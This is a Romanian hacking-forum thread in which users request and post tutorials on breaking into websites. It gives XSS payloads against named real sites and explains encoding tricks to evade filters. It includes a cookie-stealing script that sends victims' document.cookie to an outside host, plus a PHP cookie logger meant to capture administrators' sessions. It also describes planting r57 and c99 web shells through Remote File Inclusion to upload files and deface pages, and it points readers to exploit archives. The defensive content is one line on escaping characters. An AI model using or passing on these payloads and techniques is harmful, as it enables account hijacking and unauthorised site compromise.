Jump to content
vladiii

cereri tutoriale

Recommended Posts

Omule, pai nu prea stiu ce as putea spune despre exploituri, totul este atat de evident,,, De obicei gasesti diferite vulnerabilitati in siteul respectiv si exploitul o "exploateaza" si obtii privilegii pe site.

De obicei, exploiturile sunt scrise in perl (.pl) sau in C (.c) !!! Deci practic, daca esti incepator, scanezi siteul cu un web scanner (iti recomand Acunetix) apoi folosesti un exploit pentru vulnerabilitatea respectiva (www.milw0rm.org o gramada de exploituri). Sunt sute de softuri web vulnerabile, de aceea cand vezi, spre exemplu la site intr-un colt Powered by X, este bine sa cauti un exploit pentru X. Nu stiu ce sa iti spun mai multe... Cred ca sa spargi un site cu un exploit este cea mai simpla modalitate de cracking. Sper ca ti-am fost oarecum de folos.

Astept alte cereri, insa cu lucruri "ceva mai putin evidente" !!!!

Link to post
Share on other sites

Un scurt tutorial pentru tine.

De obicei, vulnerabilitatea XSS este legata de cookieuri si message boxuri. Sa presupunem ca am gasit un site vulnerabil la XSS. Fie acesta:


http://mystuff.uk.ask.com/user/DisplaySignup?prod=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

Acest micut script adaugat la URL: <script>alert('XSS')</script> nu face nimic mai mult decat a insera un message box in pui tu un text care vrei. Spre exemplu modific <script>alert('xss')</script> cu <script>alert('vladiii')</script> . URL va arata in felul urmator:


http://mystuff.uk.ask.com/user/DisplaySignup?prod=%22%3E%3Cscript%3Ealert(%22vladiii%22)%3C/script%3E

Ok, decoamdata vulnerabilitatea nu face nimic, dar o putem exploata si mai mult. In loc de mesajul (XSS si vladiii) dintre cele 2 paranteze ale alertului (ale scriptului) putem introduce: document.cookie si javascriptul care trebuie bagat la URL va arata in felul urmator: <script>alert(document.cookie)</script>. Si in cazul XSSului nostru:


http://mystuff.uk.ask.com/user/DisplaySignup?prod=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Acest script genereaza un Message Box in care se afla cookieurile tale. Acum intrebarea se pune, cum fac rost si de cookieurile altor useri, ca apoi sa ma loghez pe conturile lor folosind acest cookie ? Sa consideram urmatorul cod:


<SCRIPT>location.href="http://www.siteultau.com/cookiestealer.php?c="+escape(document.cookie)</SCRIPT>

Acest cod il introducem la url si il trimitem apoi (url'ul) la victima. Daca aceasta da click pe link, atunci cookieurile sale vor ramane la tine pe FTP sau ti se vor trimite pe mail, depinde cum este conceput stealerul.

Exemplu de link:


www.sitevulnerabil.com/pagvuln.php?ceva=<SCRIPT>location.href="http://www.siteultau.com/cookiestealer.php?c="+escape(document.cookie)</SCRIPT>

Am spus mai sus ce face acest exemplu de link.

Acum ne intrebam: "Cum imi feresc siteul de vulnerabilitati XSS?". Simplu, de obicei eliminarea metacaracterelor din codul sursa (<, >) si inlocuite cu & gt si & lt, dupa caz, etc.

Cum te feresti tu impotriva atacurilor XSS??? Nu da click pe tot felul de linkuri ciudate si nu folosi Internet Explorer ca browser deoarece este plin de buguri (personal, iti recomand Mozilla Firefox)

Linkuri utile:


[url]http://www.blooberry.com/indexdot/html/topics/urlencoding.htm[/url]
[url]http://rstzone.net/forum/viewtopic.php?t=6250[/url]
[url]http://rstzone.net/forum/viewtopic.php?t=6233[/url]
[url]http://ha.ckers.org/xss.html[/url]

Sper ca ti-am fost de folos. Vlad

Link to post
Share on other sites
Cred ca si lui dar in special mie.

TU ai explicat ft bine folosirea XSS-urilor dar nu ai explicat gasirea lor....

:roll:

Foloseste biolocatia Luke!

Pasul 1: iei o ramurica ;

Pasul 2: intri pe internet si incepi sa surfezi (navighezi);

Pasul 3: folosind biolocatia vei gasi apa...pardon...XSS.

Link to post
Share on other sites
Cred ca si lui dar in special mie.

TU ai explicat ft bine folosirea XSS-urilor dar nu ai explicat gasirea lor....

ca sa gasesti ... iti dau o metoda usoara:

-intra pe http://stiri.acasa.ro/

-dai la search si cauti <aaa>

-dupa ce dai search pt <aaa> link-ul arata asa http://stiri.acasa.ro/cautare.php?keywords=%3Caaa%3E&all=true&submit=Cauta

-in loc de %3Caaa%3E scrii <script>alert('XSS')</script>

-link-ul o sa ajunga asa: http://stiri.acasa.ro/cautare.php?keywords=<script>alert('XSS')</script>&all=true&submit=Cauta

cein mai bine downloadezi toate tutorialele video facute de slick despre XSS... [de acolo am invatat eu]

Link to post
Share on other sites

am deschis alt topic pentru ca am vazut ca nu prea ai mai intrat pe forum (nu ai net)... ti-am explicat pe mess...

cein, cum poti gasi xssurile ? In primul rand sunt sute de softuri web vulnerabile la XSS. Pentru a vedea cateva, uite aici:


[url]http://www.milw0rm.org/exploits/3490[/url]
[url]http://www.milw0rm.org/exploits/3447[/url]
[url]http://www.milw0rm.org/exploits/1547[/url]

Lista ar putea continua mult, insa nu vreau sa umplu forumul de linkuri de pe milw0rm.org, mai bine intra tu acolo, la functia Search si scrie XSS. Ai sa gasesti google dorks care apoi le poti incerca pe google pentru a gai siteuri vulnerabile.

Poate te gandesti, "Da, dar cum gasesc siteuri vulnerabile la XSS singur, fara google dorks?". Deobicei, majoritatea vulnerabilitatilor se gasesc "surfand" pe un motor de cautare, dar ca sa gasesti tu una singur, ar fi bine sa cauti mai intai in functia de Cautare (Search) a siteurilor, de obicei acolo se gaseste aceasta vulnerabilitate. Hai sa iti dau cateva exemple, din alea intelegi cel mai bine:


[url]http://www.hotbot.com/index.php?query=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&ps=&loc=searchbox&tab=web&currProv=msn&mode=?=&dfi=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&dfe=&region=&adf=[/url]
http://www.lamit.ro/cautare/index.php?query=%3Cscript%3Ealert('xss')%3C/script%3E&type=simple

De obicei, functia de Search "imparte" (daca pot sa zic asa) URL in mai multe parti, una dintre ele fiind partea in care arata ce am cautat noi. In exemplul de mai sus, query=... arata ce am cautat eu din browser, si apoi

modifici URL'ul, inlocuind ... cu <script>alert('xss')</script> . Si ai gasit propriul tau XSS. Cam asta este baza.

Pentru a pacali filtrerele web serverului sa permita adaugarea <script>alert('mesaj')</script> la URL, uneori trebuie sa encodezi URL'ul, pentru a face acest lucru si pentru a intelege ce face acel "calculator" cand encodeaza URL'ul tau, click pe urmatorul link:


[url]http://www.blooberry.com/indexdot/html/topics/urlencoding.htm[/url]

Sper ca am fost destul de explicit. Vlad

Astept alte cereri.

Link to post
Share on other sites

mersi. acuma am inteles.stiam o partea dar nu stiam sa exploatez asa de bine.

scria cineva ca nu e asa folositoarea metoda la hack siteuri.

dar cand apare un xss ptr yahoo toti sarim pe el :lol:

-----

partea buna este ca Acunetix poate scana siteurile doar pentru xss, si devine treaba mult mai usoara :D

Link to post
Share on other sites

Ca tot este vorba de xss , vladiii am o cerere la tine .

Sa zicem ca am gasit un xss in yahoo/un site anume ..

Vreau sa obtin cookiurile de la admini.

Cum formez acest cookie :-)

Imi poti explica ?

Link to post
Share on other sites

Pentru a exploata un site vulnerabil trebuie sa injectezi scripturi pentru a culege user imput.Pentru cookiuri la fel trebuie sa folosesti un limbaj de scripting in primul rand ,logic si inainte sa testezi.

Testezi cu un alert ,apoi treci la lucru.

Faci o cerere GET catre locul unde sunt stocate : ['cookie'] ,copiezi intr-o variabila cea ce gasesti,apoi directionezi acel continut undeva.

Faci o schema URL ,apoi si o postezi in forumul ,guesstbook'ul ,site'ul respectiv.

Un astfel de script arata :

O sa folosesc php.

<?php
$a=$_GET('cookie');
$b=fopen("cookies.txt","c");
fwrite($b.$cookie);
f.close($;
?>

Salvezi aa.php .

Schema url + cum o plantam :

<script>
window.location="http://site_unde_ai_uploadat_scriptul.com/aa.php?cookie='+'document.cookie;
</script>

Scuze daca am scris nush cum ,m-a grabesc.

Link to post
Share on other sites

nu inteleg Razvane ce nu intelegi din ceea ce am spus eu si flo_flow si din tutorialele video facute de slick... citeste-le cu atentie si ai sa intelegi cu siguranta!

astept cereri!

p.s. imi cer scuze daca o sa fac mai greu Mini-Tutorialele, dar am capacitatea anul acesta si trebuie sa ma ocup si de mate, romana si geogra :)

Link to post
Share on other sites

vladii daca se poate mai cer si eu un scurt tutorial.

mersi inca o data pentru xss , eu am inteles cam tot.

vreau sa invat bine metoda cu lucratul shellului c99 pe hosturi.am inteles ca trebuie gasita o erroare de linie, si gandita...as vrea sa aflu mai multe despre.

adica ideea este sa invat sa gasesc erori si sa stiu cum sa ma folosesc de ele.asa in mare daca se poate.

Link to post
Share on other sites

Ce tipuri de shell exista? Sunt doua tipuri de shell foarte importante care se folosesc in majoritatea crackurilor, acestea au 2 nume diferite: c99 si r57.

Sa le analizam un pic pe fiecare in parte:

1) r57 shell

Spre exemplu, daca gasim o vulnerabilitate intr-un site, cum ar fi Remote File Inclusion, folosim r57 shell, c99 nefiind de niciun folos in cazul de fata. r57 uploadeaza ceva pe server si listeaza apoi continutul directorului de pe server in care se afla fisierul uploadat de tine. Spre exemplu, poti uploada c99 shell, dupa care sa modifici apoi index.php sau mai stiu eu ce.

O mica imagine cu r57 shell :) :

r57zu9.jpg

Deci spre exemplu gasim un RFI intr-un site, sa zicem: http://sitevulnerabil.com/vulnpath=adresa de la shell

Ok, pana aici nimic nou, doar am gasit vulnerabilitatea si am pus la URL r57 shell. Ce facem mai departe? Ideea este sa uploadam ceva, nu? De preferat ar fi sa uploadam un c99 shell, dar asta depinde de fiecare. Cum uploadam ceva? Uite aici un exemplu:

r572vl1.jpg

Dam click pe butonul Browse din exemplu, selectam din calculator ce vrem sa uploadam si dam Upload si voila... Ceea ce am uploadat se va gasi pe server si poate fi accesat sin URL. Sa presupunem ca am uploadat c99.php. Sa continuam cu analiza lui :)

2) c99 shell

Urmatoarea poza ilustreaza un c99 shell:

c99lg2.jpg

In exemplul de mai sus nu se vede prea bine, dar in casuta in care se listeaza paginile .php si directoarele, in partea dreapta, sunt vreo casute (in dreptul fiecaruia) si mi se pare (nu mai stiu, m-am lasat de hacking:) ) ca pe al 2-lea buton daca dai o sa iti afiseze codul sursa, pe care il modifici dupa bunul plac si apoi dai Save. In exemplul din imagine ai drept si de citire, si de scriere, si de executare (drwx si rwx). Pe unele shelluri s-ar putea sa nu poti sa faci aceste lucruri.

Cam atat pentru azi :) vladiii 2007

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.


×
×
  • Create New...